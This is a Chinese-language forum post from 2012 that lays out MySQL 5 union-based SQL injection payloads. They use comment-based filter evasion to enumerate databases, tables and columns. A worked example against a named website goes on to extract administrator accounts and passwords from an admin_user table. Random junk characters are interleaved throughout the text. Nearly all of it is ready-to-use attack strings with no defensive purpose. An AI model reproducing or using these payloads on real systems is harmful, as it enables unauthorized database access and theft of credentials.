查库+ n$ t; f+ F# ~' N( q
6 y' u. z1 h9 t3 m+ R% @id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
{1 |* V8 |) r5 Y" M( J
3 [3 y$ A; Z0 ^查表
3 d% L4 A0 }+ M1 g5 S
/ B2 ~3 j! S6 Q! kid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
% S y6 h2 o* x
: x6 A5 g. L* H: G) t4 n查段. W! s" C: i( D
' V" {! v2 Y2 G. w/ v5 aid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1' q& b! d8 k, c' k
8 |( v5 w, ]$ G+ ~
+ w) G8 X+ C/ @( nmysql5高级注入方法暴表$ Q7 f. M9 k2 [# w
8 Q& X/ H8 k: b {; Q+ e! n
例子如下:
5 x; G/ u! c) U2 C
8 u; X. X6 [3 v$ f: }3 w, m& k/ o1.爆表
( b# X, w7 J& Vhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)0 x7 X! U( P v. u: J
这样爆到第4个时出现了admin_user表。
9 }) A" K3 M* Q ?% h) o: U' k. I
: d& c" |( G; O! J& v% l+ }, ]2.暴字段5 J) l g$ Y4 |% o) q6 U/ V
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*( l$ Q! @9 \' J
4 U3 w) f5 j$ }. j. [& ]
8 @* P7 T) T! d$ Q$ [9 i3.爆密码
8 E9 L G1 E- O% _5 m' X/ shttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
4 E z' T+ T7 B" L2 v0 B3 m9 Y9 C# d% }9 G
+ Y6 ~) f8 c. ^5 M- W
|
发表于 2012-9-13 16:29:37
收藏
支持
反对